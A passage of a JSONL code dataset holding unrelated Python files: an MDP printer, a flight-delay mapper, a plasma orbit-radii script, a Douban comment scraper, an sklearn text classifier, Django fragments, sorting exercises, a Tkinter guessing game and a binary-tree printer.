If detailed is True it also prints the Q-states.\"\"\"\n for state in self._states:\n if detailed:\n state.print_detailed()\n print(\"\")\n else:\n print(state)\n\n def print_state_details(self):\n \"\"\"Prints the Q-states and the transition and reward lists for each Q-state.\"\"\"\n for state in self._states:\n print(\"Node %d:\" % state.state_num)\n for q_state in state.q_states:\n print(q_state)\n # print(\"Transitions:\", qs.transitions)\n # print(\"Rewards: \", qs.rewards)\n print(\"\")\n","sub_path":"markovdp/mdp_dt_model.py","file_name":"mdp_dt_model.py","file_ext":"py","file_size_in_byte":25083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"621775681","text":"#!/usr/bin/env python3\n\nimport sys\n\n# input comes from STDIN (standard input)\nfor line in sys.stdin:\n carrierDelay = \"\"\n weatherDelay = \"\"\n NASDelay = \"\"\n securityDelay = \"\"\n lateAircraftDelay = \"\"\n curIndex = 0\n # remove leading and trailing whitespace\n line = line.strip()\n # split the line into words\n words = line.split(\",\")\n # increase counters\n for word in words:\n if curIndex == 58: carrierDelay = word\n if curIndex == 59: weatherDelay = word\n if curIndex == 60: NASDelay = word\n if curIndex == 61: securityDelay = word\n if curIndex == 62: lateAircraftDelay = word\n curIndex = curIndex + 1\n #print(airline)\n #print(depDel15)\n #print(arrDel15)\n # write the results to STDOUT (standard output);\n # what we output here will be the input for the\n # Reduce step, i.e. the input for reducer.py\n #\n # tab-delimited; the trivial word count is 1\n if carrierDelay != \"1.00\" and carrierDelay != \"\":\n print(\"{0}\\t1\".format(\"Carrier delay\"))\n if weatherDelay != \"1.00\" and weatherDelay != \"\":\n print(\"{0}\\t1\".format(\"Weather delay\"))\n if NASDelay != \"1.00\" and NASDelay != \"\":\n print(\"{0}\\t1\".format(\"NAS delay\"))\n if securityDelay != \"1.00\" and securityDelay != \"\":\n print(\"{0}\\t1\".format(\"Security delay\"))\n if lateAircraftDelay != \"1.00\" and lateAircraftDelay != \"\":\n print(\"{0}\\t1\".format(\"Late aircraft\"))\n","sub_path":"reasonMapper.py","file_name":"reasonMapper.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"175452534","text":"# Make a file with orbit intersections\n#\n# calculate the mean mid-plane intersection radiuii for ensemble calculation\n#\n# uses 5 digit track numbering and assumes the standard format from ensemle calculations\n# \n# this version is for orbit3 output\n\nimport fileinput as FI\nimport numpy as np\nimport LT.box as B\nimport os.path as P\nimport os\nimport database_operations as db\nimport glob as G\n#import sys\n#from LT.parameterfile import pfile\n\n\n# special version for orbit data\n\nimport orbit_view_data_fast as vd\n# import orbit_view_data as vd\n# parse arguments\nimport argparse as AG\n\n\nparser = AG.ArgumentParser()\n#parser.add_argument(\"control_file\", nargs = '?', help=\"Control file \", default = 'control_get_radii.data')\nparser.add_argument(\"Shot\", nargs = '?', help=\"Control file \", default = 29975)\nargs = parser.parse_args()\nshot=args.Shot\n#----------------------------------------------------------------------\n# find the first mid-plane crossing of trajectory v\ndef get_zero_crossing(v):\n i_n = np.where(v.zt<=0.)[0][0]\n i_p = i_n - 1\n zp = v.zt[i_p]\n rp = v.rt[i_p]\n zn = v.zt[i_n]\n rn = v.rt[i_n]\n m = (zp -zn)/(rp - rn)\n r0 = rn - 
zn/m\n return r0\n \ndef get_names_ch(s):\n vf = s.replace(' ','').split(',')\n name = []\n chan = []\n for v in vf:\n fields = v.split('/')\n v_name = fields[0]\n ch = np.array(fields[1:]).astype(int)\n name.append(v_name)\n chan.append(ch)\n return name, chan\n\ndef get_magnetic_axis(of):\n z_ok = False\n r_ok = False\n for line in FI.input(of):\n if line.find('rmaxis')>=0:\n rmaxis = float(line.split('=')[1])\n r_ok = True\n if line.find('zmaxis')>=0:\n zmaxis = float(line.split('=')[1])\n z_ok = True\n if (r_ok & z_ok):\n FI.close()\n break\n return rmaxis, zmaxis \n\n\n# get parameters from file\n\n\n#cd = pfile(args.control_file)\n\ndef get_times(view_names):\n times = []\n for vn in view_names:\n f = vn.split('_')\n t = []\n for ff in f:\n try:\n x = float(ff)\n except:\n continue\n t.append(x)\n times.append(t[-1])\n return times\n \n\n# define the emissivity model\n#----------------------------------------------------------------------\nview_files = []\nmag_axis = []\n\ndet_exp = []\nch_exp = []\nR_exp = []\ndR_exp = []\n\nR_exp_n = []\ndR_exp_n = []\n# get data\n\n\n(view_dir,)= db.retrieve('view_dir', 'Combined_Rates', 'Shot = '+str(shot))\n#view_dir = cd.get_value('view_dir')\n(view_name,) = db.retrieve('view_names', 'Combined_Rates', 'Shot = '+str(shot))\n#view_names, v_chan = get_names_ch( cd.get_value('views') )\n(channels_str,) = db.retrieve('Channels', 'Combined_Rates', 'Shot = '+str(shot))\nv_chan_f = list(map(int, channels_str.split(',')))\nv_chan=[[0,1,2,3,4,5]]\nview_names=[]\nview_names.append(view_name)\n#v_chan.append(v_chan_f)\nv_chan_f = np.array(v_chan).flatten()\n#print view_names\n#print v_chan_f\n#print v_chan\n#try:\n# res_dir = cd.get_value('results_dir')\n#except:\nres_dir = './Analysis_Results/'+str(shot)+'/emissivity_model_results/'\n\n(r_min,r_max)= db.retrieve('r_min, r_max', 'Combined_Rates', 'Shot = '+str(shot))\n#r_min = cd.get_value('r_min')\n#r_max = cd.get_value('r_max')\n\n#shot = cd.get_value('shot', int)\n\nchannels = []\n# assemble the information\n# orbit view data and rate data MUST match\n\nfor i, v_d in enumerate(view_names):\n # loop over directories\n v_f = view_dir + '/' + v_d + '/' #mymod Alex\n # get the magnetic axis data\n rm,zm = get_magnetic_axis( v_f + 'orbit_output') \n ch = []\n for j, n in enumerate(v_chan[i]):\n n += 1\n # loop over detectors in views\n patt = 'track_{0:1d}????.data'.format(n)\n view_patt = v_f + patt\n print(view_patt)\n view_f = G.glob(view_patt)\n print(view_f)\n # contains all tracks for a given detector\n view_files.append(view_f)\n mag_axis.append((rm,zm))\n vdd = B.get_file(view_f[0])\n cc = vdd.par.get_value('channel_number',int)\n ch.append(cc)\n channels.append(ch)\n\n\n# map views and channels\nall_views = []\nfor i, vf in enumerate(view_files):\n print('loading detector : ', v_chan_f[i], ' from : '+P.split(vf[0])[0])\n views = []\n for f in vf:\n # print ' getting view : ', f\n views.append(vd.view(f))\n all_views.append(views)\n\n\n# get stored channel information\n\nxv = np.arange(len(views))\n\n\n# get zero crossings\nR_mid = []\nfor views in all_views:\n R0 = np.array([ get_zero_crossing(v) for v in views ])\n R_mid.append([R0.mean(), np.sqrt(R0.var())])\nR_mid = np.array(R_mid)\n\n# reshape array, assumes that all views have the same number of channels\nR0a = R_mid[:,0].reshape(len(view_names), len(v_chan[0]))\nsig_R0a = R_mid[:,1].reshape(len(view_names), len(v_chan[0]))\n\ntimes = get_times(view_names) \n\n# plot the radii\n\n# midplane intersection for detectors\nr1 = R0a[:,0]\n
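# columns of R0a / sig_R0a follow the detector/channel order assembled in v_chan above\nr2 = 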
R0a[:,1]\nr3 = R0a[:,2]\nr4 = R0a[:,3]\nr5 = R0a[:,4]\nr6 = R0a[:,5]\n\ndr1 = sig_R0a[:,0]\ndr2 = sig_R0a[:,1]\ndr3 = sig_R0a[:,2]\ndr4 = sig_R0a[:,3]\ndr5 = sig_R0a[:,4]\ndr6 = sig_R0a[:,5]\n\n# range in R covered (2 sigma)\n\nB.plot_exp(times, r1, dr1, color = 'r' , label = 'view 1, ch {}'.format(channels[0][0]))\nB.plot_exp(times, r2, dr2, color = 'g', label = 'view 2, ch {}'.format(channels[0][1]))\nB.plot_exp(times, r3, dr3, color = 'b', label = 'view 3, ch {}'.format(channels[0][2]))\nB.plot_exp(times, r4, dr4, color = 'y', label = 'view 4, ch {}'.format(channels[0][3]))\nB.plot_exp(times, r5, dr5, color = 'm', label = 'view 5, ch {}'.format(channels[0][4]))\nB.plot_exp(times, r6, dr6, color = 'c', label = 'view 6, ch {}'.format(channels[0][5]))\n\nB.pl.xlabel('time (s)')\nB.pl.ylabel('R mid-plane (m)')\nB.pl.ylim((r_min, r_max))\nB.pl.title('Mid-Plane radii for {}'.format(shot))\n\nB.pl.legend(loc = 'upper right')\n\nB.pl.show()\n\n# save the radii in a file, they can be used for plotting\nfile_name = res_dir + 'orbit_mean_rad_mid_plane_{}.data'.format(shot)\nif not os.path.exists(os.path.dirname(file_name)):\n os.makedirs(os.path.dirname(file_name))\nif os.path.isfile(file_name):\n inp = input(\"Do you want to overwrite the results file? (y)es or (n)o: \") \n if inp == \"yes\" or inp == \"y\": \n os.remove(file_name)\n print('Old file removed.')\no = open(file_name,'w')\no.write('# mean mid-plane intersections for a range of times\\n')\no.write('#! t[f,0]/ r0[f,1]/ r1[f,2]/ r2[f,3]/ r3[f,4]/ r4[f,5]/ r5[f,6]/ ch0[f,5]/ ch1[f,6]/ ch2[f,7]/ ch3[f,8]/ ch4[f,9]/ ch5[f,10]/ \\n')\n\nfor i,tt in enumerate(times):\n print(\"writing time : \", tt, i)\n cc = channels[i]\n o.write('{} {} {} {} {} {} {} {} {} {} {} {} {}\\n'.format(tt, \\\n r1[i], \\\n r2[i], \\\n r3[i], \\\n r4[i], \\\n r5[i], \\\n r6[i], \\\n cc[0], cc[1], cc[2], cc[3], cc[4], cc[5] )) #dr1[i]\n# done\no.close()\n","sub_path":"analysis_modules/archive_old/orbit_get_mean_radii_par.py","file_name":"orbit_get_mean_radii_par.py","file_ext":"py","file_size_in_byte":6905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"181411558","text":"import requests\nfrom bs4 import BeautifulSoup as bs\n\n\n\ndef dbmoviecomment():\n for n in list(range(20 ,4000 ,20)):\n url = 'https://movie.douban.com/subject/1578714/comments?start=' + str(n) + '&limit=20&sort=new_score&status=P'\n html = requests.get(url).content\n html = bs(html ,'html.parser')\n div = html.find_all(name = 'div' ,attrs = {'class' :'comment'})\n for x in div:\n p = x.find_all(name = 'p')\n for y in p:\n with open('special woman.txt' , 'ab+') as file:\n file.write(y.get_text().encode())\n # Scrape Douban movie reviews for Wonder Woman
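\n\n# illustrative usage:\n#   dbmoviecomment()  # appends each comment's text to 'special woman.txt'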
]\n","sub_path":"conferenceR/migrations/0002_conferenceregistration_visa_arrival.py","file_name":"0002_conferenceregistration_visa_arrival.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"83527055","text":"# Author: Sumedh Chandaluri\n# 206021\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom sklearn.model_selection import GridSearchCV, train_test_split, validation_curve\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.metrics import precision_score, recall_score, f1_score\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\n\nfrom nltk.stem import PorterStemmer\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport pickle\n\n\nclass SPi_basic_nlp:\n\n def __init__(self, df, text_col, class_col, max_features, n_gram, name, path):\n \n \"\"\" self, represents the instance of the class.\n \n Here by creating an object, you can have train-test-split, then create a count vectorizer and \n fit_transform on train set & transform on test set. After that we save count vectorizer object for tranforming on test query also\n \n Inputs\n 1. DataFrame\n 2. Text Column Name\n 3. Class Label Column Name\n 4. max_features to be used for count_vectorizer (sklearn)\n 5. n-grams to be used for count_vectorizer (sklearn)\n 6. each type of 'strtaxonomy'(a column in df)\n eg: We have 3 different types of 'strtaxonomy'\n a) for 'patient problem code', keep name = 'patient'\n b) for 'device problem code', keep name = 'device'\n c) for 'medical evaluation result code', keep name = 'medical'\n 7. path where we save all our \n a) count_vectorizer object for each 'strtaxonomy'\n b) model for each 'strtaxonomy'\n \"\"\"\n \n self.df = df\n self.text_col = text_col\n self.class_col = class_col\n self.max_features = max_features\n self.name = name\n self.path = path\n self.ngram = n_gram\n X_train_df, X_test_df, self.y_train, self.y_test = train_test_split(df[text_col], df[class_col], test_size=0.1, random_state=93)\n with open('stopwords_2.pickle', 'rb') as handle:\n stopwords = pickle.load(handle)\n \n # count_vec = CountVectorizer(ngram_range=(1, n_gram), binary=True, max_features=max_features, stop_words=stopwords)\n # self.X_train = count_vec.fit_transform(X_train_df)\n # self.X_test = count_vec.transform(X_test_df) \n # with open(self.path + 'count_vectorizer_' + self.name + '.pickle', 'wb') as handle:\n # pickle.dump(count_vec, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \n tfidf_vec = TfidfVectorizer(ngram_range=(1, n_gram), binary=True, max_features=max_features, stop_words=stopwords)\n self.X_train = tfidf_vec.fit_transform(X_train_df)\n self.X_test = tfidf_vec.transform(X_test_df)\n with open(self.path + 'tfidf_vectorizer_' + self.name + '.pickle', 'wb') as handle:\n pickle.dump(tfidf_vec, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n @classmethod\n def basic_preprocessing(cls, df, text_cols):\n \n \"\"\" Basic Pre-Processings like\n 1. Making all given text columns into lower\n 2. Removing spcaes/new line at the end of the text\n eg: a) 'cats ' to 'cats'\n b) 'dogs\\n' to 'dogs'\n 3. Reseting Index\n \n Inputs\n 1. DataFrame\n 2. All the columns (list of strings/column names) where text is present and want to remove spaces/new line at the end.\n \n Output\n 1. 
\n for col in text_cols:\n df[col] = df[col].str.lower()\n df[col] = df[col].str.rstrip()\n \n df.drop_duplicates(inplace=True)\n df.reset_index(drop=True, inplace=True)\n \n return df\n \n @classmethod\n def stemming_sentence(cls, sentence):\n \n \"\"\" Given a string, it converts each word into its root word and returns a stemmed string.\n You have to use below code to apply on the whole column of a DataFrame:\n \n 'df[column name] = df[column name].apply(SPi_basic_nlp.stemming_sentence)'\n \n Input:\n 1. string\n Output:\n 1. string\n \"\"\"\n porter_stemmer = PorterStemmer()\n tokens = sentence.split()\n stemmed_tokens = [porter_stemmer.stem(token) for token in tokens]\n \n return ' '.join(stemmed_tokens)\n \n @classmethod \n def plural_to_singular(cls, content):\n \n ''' Given a string, it converts each plural word into its singular form and returns a string.\n You have to use below code to apply on the whole column of a DataFrame:\n \n 'df[column name] = df[column name].apply(SPi_basic_nlp.plural_to_singular)'\n \n Inputs:\n content: string \n Returns:\n content: plurals in the string (content) made to singular\n '''\n blob = TextBlob(content)\n singles = [word.singularize() for word in blob.words] # plural to singular\n \n return ' '.join(singles)\n\n @classmethod\n def after_preprocessings(cls, df, str_1, top):\n \n \"\"\" Making the data feedable to create a Model\n 1. Calculating top 'n' most occurring class labels and making all other variables as 'others'((n+1)th class)\n 2. Returns a DataFrame\n \n Inputs\n 1. DataFrame\n 2. type of DataFrame\n 3. 'n' most occurring class labels\n \n Output\n 1. DataFrame making remaining labels as 'others'\n \"\"\"\n \n new = df[df['strtaxonomy'] == str_1]['strNode'].value_counts().rename_axis('strNode').reset_index(name='count')\n new = new.head(top)\n class_1 = list(new['strNode'])\n\n df_class_1 = pd.DataFrame()\n for i in class_1:\n temp = df[df['strNode'] == i]\n df_class_1 = df_class_1.append(temp)\n\n merge = pd.merge(df_class_1, df[df['strtaxonomy'] == str_1], on=list(df.columns), how='outer', indicator=True)\n others_class_1 = merge[merge['_merge'] == 'right_only']\n others_class_1['strNode'] = 'others'\n final_class_1 = pd.DataFrame()\n final_class_1 = final_class_1.append(merge[merge['_merge'] == 'both'])\n final_class_1 = final_class_1.append(others_class_1)\n \n del final_class_1['_merge']\n \n return final_class_1\n\n \n def logistic_multiclass_model(self, param_range):\n \n \"\"\" self, represents the instance of the class.\n \n Hyperparameter Tuning using GridSearchCV (3-Cross Validation) on Logistic Regression and saves hyperparameter tuned model of Logistic Regression.\n Hyperparameter tuning 'C', 'penalty'.\n \n Input\n 1. list of various numbers for Hyperparameter 'C'\n
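 eg: param_range = [0.001, 0.01, 0.1, 1, 10, 100]  (illustrative values)\n \n Output\n 1. 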
No Returns, only saves the best model of Logistic Regression in self.path\n \n \n Note: Before you call this function create an object and then call this function\n \"\"\"\n\n tuned_parameters = [{'C': param_range, 'penalty':['l1','l2']}]\n model = GridSearchCV(LogisticRegression(class_weight='balanced', random_state=93, multi_class='auto'), tuned_parameters, scoring='f1_micro', cv=3)\n model.fit(self.X_train, self.y_train)\n pred = model.predict(self.X_test)\n print(model.best_estimator_)\n print(model.score(self.X_test, self.y_test))\n print('\\n\\n')\n \n filename = 'logistic_' + str(self.name) + '.sav'\n pickle.dump(model, open(self.path + filename, 'wb'))\n \n \n def sgd_multiclass_model(self, param_range):\n \n \"\"\" self, represents the instance of the class.\n \n Hyperparameter Tuning using GridSearchCV (3-Cross Validation) on SGD Classifier and saves hyperparameter tuned model of SGD Classifier.\n Hyperparameter tuning 'alpha', 'penalty'.\n \n Input\n 1. list of various numbers for Hyperparameter 'alpha'.\n \n Output\n 1. No Returns, only saves the best model of SGD Classifier in self.path\n \n \n Note: Before you call this function create an object and then call this function\n \"\"\"\n\n tuned_parameters = [{'alpha': param_range, 'penalty':['l1','l2']}]\n model = GridSearchCV(SGDClassifier(class_weight='balanced', random_state=93), tuned_parameters, scoring='f1_micro', cv=3)\n model.fit(self.X_train, self.y_train)\n pred = model.predict(self.X_test)\n print(model.best_estimator_)\n print(model.score(self.X_test, self.y_test))\n print('\\n\\n')\n \n filename = 'sgd_' + str(self.name) + '.sav'\n pickle.dump(model, open(self.path + filename, 'wb'))\n \n \n def rfdt_multiclass_model(self, param_range):\n \n \"\"\" self, represents the instance of the class.\n \n Hyperparameter Tuning using GridSearchCV (3-Cross Validation) on RandomForestClassifier and saves hyperparameter tuned model of RandomForestClassifier.\n Hyperparameter tuning 'n_estimators'.\n \n Input\n 1. list of various numbers for Hyperparameter 'n_estimators'.\n \n Output\n 1. No Returns, only saves the best model of RandomForestClassifier in self.path\n \n \n Note: Before you call this function create an object and then call this function\n \"\"\"\n\n tuned_parameters = [{'n_estimators': param_range}]\n model = GridSearchCV(RandomForestClassifier(class_weight='balanced', random_state=93), tuned_parameters, scoring='f1_micro', cv=3)\n model.fit(self.X_train, self.y_train)\n pred = model.predict(self.X_test)\n print(model.best_estimator_)\n print(model.score(self.X_test, self.y_test))\n print('\\n\\n')\n \n filename = 'rfdt_' + str(self.name) + '.sav'\n pickle.dump(model, open(self.path + filename, 'wb'))\n \n\n def gbdt_multiclass_model(self, param_range): # work in progress\n \n \"\"\" self, represents the instance of the class.\n \n Hyperparameter Tuning using GridSearchCV (3-Cross Validation) on GradientBoostingClassifier and saves hyperparameter tuned model of GradientBoostingClassifier.\n Hyperparameter tuning 'n_estimators'.\n \n Input\n 1. list of various numbers for Hyperparameter 'n_estimators'.\n \n Output\n 1. 
No Returns, only saves the best model of GradientBoostingClassifier in self.path\n \n \n Note: Before you call this function create an object and then call this function\n \"\"\"\n\n tuned_parameters = [{'n_estimators': param_range}]\n model = GridSearchCV(GradientBoostingClassifier(random_state=93), tuned_parameters, scoring='f1_micro', cv=3)\n model.fit(self.X_train, self.y_train)\n pred = model.predict(self.X_test)\n print(model.best_estimator_)\n print(model.score(self.X_test, self.y_test))\n print('\\n\\n')\n \n filename = 'gbdt_' + str(self.name) + '.sav'\n pickle.dump(model, open(self.path + filename, 'wb'))\n \n \n def train_test_plot(self, param_range, param_name):\n \n \"\"\" self, represents the instance of the class.\n \n Train-Test Plot \n \n Input\n 1. param_range \n i.e. for hyperparameter 'C' in LR.\n for hyperparameter 'alpha' in SGD.\n \n Output\n 1. No returns, Plots the Train-Test f1_micro plots and also prints Train-Test f1 scores for each Hyperparameter i.e. either 'C' or 'alpha'.\n \"\"\"\n \n train_scores, test_scores = validation_curve(LogisticRegression(class_weight='balanced', random_state=93, multi_class='multinomial'), self.X_train, self.y_train, \n param_name=param_name, param_range=param_range, scoring='f1_micro', cv=3, n_jobs=1)\n \n train_scores_mean = np.mean(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n plt.plot(param_range, train_scores_mean, label = \"Training Score\")\n plt.plot(param_range, test_scores_mean, label = \"Test Score\")\n plt.grid()\n plt.title(\"Train-Test Scores Curve for LR with varying '{}' \".format(param_name))\n plt.xlabel(\"Varying \" + param_name + \" ----->\")\n plt.ylabel(\"f1_micro Scores ----->\")\n plt.legend()\n plt.show()\n print(train_scores_mean)\n print(test_scores_mean)\n print('\\n\\n')\n \n \n def train_model_scores(self, model_type):\n \n \"\"\" self, represents the instance of the class.\n \n Print Train Scores, i.e. calculating \n 1. Precision\n 2. Recall\n 3. F1 Micro Score\n \n Using Direct functions of sklearn.\n \"\"\"\n \n loaded_model = pickle.load(open(self.path + str(model_type) + '_' + self.name + '.sav', 'rb'))\n pred = loaded_model.predict(self.X_train)\n pre_score = precision_score(self.y_train, pred, average=None, pos_label=1, sample_weight=None)\n recall = recall_score(self.y_train, pred, average=None)\n f1 = f1_score(self.y_train, pred, average=None)\n print('Train Scores')\n print('Precision =' ,pre_score)\n print('Recall =' ,recall)\n print('F1 Score =' ,f1)\n print('\\n\\n')\n \n \n def test_model_scores(self, model_type):\n \n \"\"\" self, represents the instance of the class.\n \n Print Test Scores, i.e. calculating \n 1. Precision\n 2. Recall\n 3. F1 Micro Score\n \n Using Direct functions of sklearn.\n \"\"\"\n \n loaded_model = pickle.load(open(self.path + str(model_type) + '_' + self.name + '.sav', 'rb'))\n pred = loaded_model.predict(self.X_test)\n pre_score = precision_score(self.y_test, pred, average=None, pos_label=1, sample_weight=None)\n recall = recall_score(self.y_test, pred, average=None)\n f1 = f1_score(self.y_test, pred, average=None)\n print('Test Scores')\n print('Precision =' ,pre_score)\n print('Recall =' ,recall)\n print('F1 Score =' ,f1)\n print('\\n\\n')\n \n\n def query_predict(self, df, model_name):\n \n \"\"\" self, represents the instance of the class.\n \n Predicting the class label of a New Query given its tokenizer and Model \n \n Inputs\n 1. Basic Pre-processed DataFrame\n 2. 
model_name\n eg: For Logistic Regression, model_name = 'logistic'\n For SGDClassifier, model_name = 'sgd'\n \n Outputs\n 1. DataFrame with predicted label \n \"\"\"\n \n with open(self.path + 'tfidf_vectorizer_' + self.name + '.pickle', 'rb') as handle:\n count_vec = pickle.load(handle)\n \n X_test = count_vec.transform(df['FOI_TEXT_TRIM'])\n loaded_model = pickle.load(open(self.path + str(model_name) + '_' + self.name + '.sav', 'rb'))\n pred = loaded_model.predict(X_test)\n df['pred'] = pred\n \n return df","sub_path":"spinlp/python 2/functions_2.py","file_name":"functions_2.py","file_ext":"py","file_size_in_byte":15824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"147110232","text":"def binary(n):\n s=[]\n while n:\n s.append(n%2)\n n >>= 1\n s=s[::-1]\n b = ''.join([chr(i+48) for i in s])\n return b\n \ndef maxOnes(n):\n sbin = binary(n)\n val = 0\n counter = 0\n for c in sbin:\n counter = counter + 1 if c == '1' else 0\n val = max(val, counter)\n return val\n
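\n# quick sanity check (illustrative):\n#   maxOnes(0b110111)  # -> 3, the longest run of consecutive 1 bits\n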
url(r'^subcat/(?P[\w\-]+)/$', AdSubCategoryView.as_view(), name='ad_subcategory'),\n url(r'^reg_(?P[\w\-]+)/name_(?P[\w\-]+)/$', AdRegionSubCategoryView.as_view(), name='ad_subcategory_region'),\n url(r'^(?P[\w\-]+)/sub_(?P[\w\-]+)/$', AdCitySubCategoryView.as_view(), name='ad_subcategory_city')\n]\n","sub_path":"ad_categories/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"341707492","text":"dicio={\"Santiago\":(\"Nuno\",\"laco\"),\"Nuno\":(\"Maria\",\"sapatos\"),\"Maria\":(\"Santiago\",\"cartas\"),\"Carlos\":(\"Pedro\",\"lata\")}\r\n\r\ndef secret_friend(dicio):\r\n for key1,value1 in dicio.items():\r\n count1=0\r\n count2=0\r\n for key2,value2 in dicio.items():\r\n if key1 == value2[0]:\r\n count1 += 1\r\n if value1[0]==key2:\r\n count2 += 1\r\n if count1==0:\r\n print(key1,\"does not receive a gift\")\r\n if count2==0:\r\n print(value1[0],\"does not give one\")\r\n return \"\"\r\n\r\n\r\n\r\nprint(secret_friend(dicio))\r\n\r\n","sub_path":"Cap6/Cap6_exos_ficha/Ex 3..py","file_name":"Ex 3..py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"85136105","text":"import numpy as np\nn = int(input('Number of elements in the array: '))\nA = np.zeros(n, dtype = np.int_)\nfor j in range(n):\n A[j] = int(input('Enter the array elements: '))\nprint(\"your array: \", A)\nN = len(A)\ni = 0\nflag = True\nwhile flag:\n flag = False\n for j in range(N-i-1):\n if (A[j] > A[j+1]):\n tmp = A[j]\n A[j] = A[j+1]\n A[j + 1] = tmp\n flag = True\n i+=1\n print(A)\n\nimport numpy as np\nb = int(input(\"Enter the number of elements in the array\"))\na = np.zeros(b , dtype = int)\nfor i in range(b):\n a[i] = int(input(\"Fill in the array\"))\nprint (a)\nm=len(a)-1\nwhile m>0:\n for i in range(m):\n if (a[i]>a[i+1]):\n a[i], a[i+1] = a[i+1], a[i]\n m -= 1\n print(a)","sub_path":"laba 4/bubble sort.py","file_name":"bubble sort.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"115886333","text":"#-*- coding:utf-8 -*-\n__author__ = 'LIPENGFEI006'\nfrom common.getconfig import GetConfig\nfrom common.verify import Verify\nfrom common.md5sum import getmd5sum\nfrom nose.plugins.attrib import attr\nfrom common.requestslib import RequestsLib\n\n@attr('cityarea','hhub3')\nclass TestCityArea():\n @classmethod\n def setup_class(self):\n self.conf = GetConfig()\n self.verity=Verify()\n self.url \\\n = self.conf.get_conf_value(\"hhub3\",\"url\")+r\"api/City/CityArea\"\n self.requestslib = RequestsLib()\n\n @classmethod\n def teardown_class(self):\n pass\n\n def TestCityArea_status(self):\n u'Get the metro stations, airports, landmarks (business districts) and train stations under a city. Works for both domestic and international cities. See the data model description for the AreaType mapping.'\n\n params = dict()\n params['CityID'] = '3104'\n response = self.requestslib.send_request_by_alltoken('get', self.url, request_body=params)\n # check the status code\n self.verity.by_status(response, 200)\n\n\n\n\n\n","sub_path":"testproject/hhub3/city/cityarea/testcityarea.py","file_name":"testcityarea.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"464430422","text":"import random\nfrom tkinter import *\nfrom tkinter import messagebox\n\ncount_guess = 1\nguessed = int(random.randint(1, 100))\nMAX_GUESSED = 100\n\n\nclass Game:\n def __init__(self, count_guess, guessed):\n self.count_guess = 
count_guess\n self.guessed = guessed\n # GUI Window game\n self.root = Tk()\n self.frame = Frame(self.root).pack()\n self.root.wm_title(\"GUESS ME!\")\n self.root.geometry(\"450x200\")\n Label(self.root, text=\"WELCOME TO GUESS ME!\", font=\"yellow\").pack()\n Label(self.root, text=\"you need to guess a number between 1 and 100\", font=\"yellow\").pack()\n Label(self.root, text=\"if your guess is too high, you get 'too high'\", font=\"yellow\").pack()\n Label(self.root, text=\"if your guess is too low, you get 'too low'\", font=\"yellow\").pack()\n Label(self.root, text=\"LET'S GO!\", font=\"yellow\").pack()\n\n self.entrytext = StringVar()\n self.entry = Entry(self.root, textvariable=self.entrytext)\n self.entry.pack()\n\n self.buttontext = StringVar()\n self.buttontext.set(\"Push Me!\")\n self.button = Button(self.root, textvariable=self.buttontext, command=self.clicked1).pack()\n\n self.label = Label(self.root, text=\"\")\n self.label.pack()\n\n self.root.mainloop()\n\n def new_game(self):\n self.entry.delete(0, 20)\n self.guessed = int(random.randint(1, 100))\n self.count_guess = 0\n self.label.configure(text=\"NEW GAME!\", font='yellow')\n\n def clicked1(self):\n try:\n guess = int(self.entrytext.get())\n if guess == self.guessed:\n self.label.configure(text=\"CONGRATULATIONS, YOU GUESSED IT RIGHT!!\", font='yellow')\n answer = messagebox.askquestion(\"Guess Me Game!\", f\"CONGRATULATIONS, YOU WIN after {self.count_guess} guesses!!!!!, do you want another game?\")\n if answer.lower() == \"yes\":\n self.new_game()\n else:\n quit()\n elif guess > MAX_GUESSED:\n self.label.configure(text=\"your guess is too high!\\n please try a number between 1 and 100\", font='yellow')\n elif guess > self.guessed:\n self.label.configure(text=f\"your number: {guess} is Too High, please try again\", font='yellow')\n else:\n self.label.configure(text=f\"your number: {guess} is Too Low, please try again\", font='yellow')\n self.count_guess += 1\n except ValueError:\n self.label.configure(text=\"you didn't enter a number!\\n please try a number between 1 and 100\", font='yellow')\n\n\nGame(count_guess, guessed)\n","sub_path":"games/GuessMeGameWithGui.py","file_name":"GuessMeGameWithGui.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"649785629","text":"class Solution:\n def printTree(self, root):\n \n def height(root):\n if not root:\n return 0\n lh = height(root.left)\n rh = height(root.right)\n return max(lh + 1, rh + 1)\n \n h = height(root)\n self.matrix = [[\"\"] * (2**h - 1) for _ in range(h)]\n \n def traverse(root, level, pos):\n if not root:\n return\n \n pad = 2**(h-level-1) - 1\n space = 2**(h-level) - 1\n \n index = pad + (space + 1) * pos\n self.matrix[level][index] = str(root.val)\n traverse(root.left, level + 1, pos << 1)\n traverse(root.right, level + 1, (pos << 1) + 1)\n \n traverse(root, 0, 0)\n return self.matrix\n \n","sub_path":"python/655 Print Binary Tree.py","file_name":"655 Print Binary Tree.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
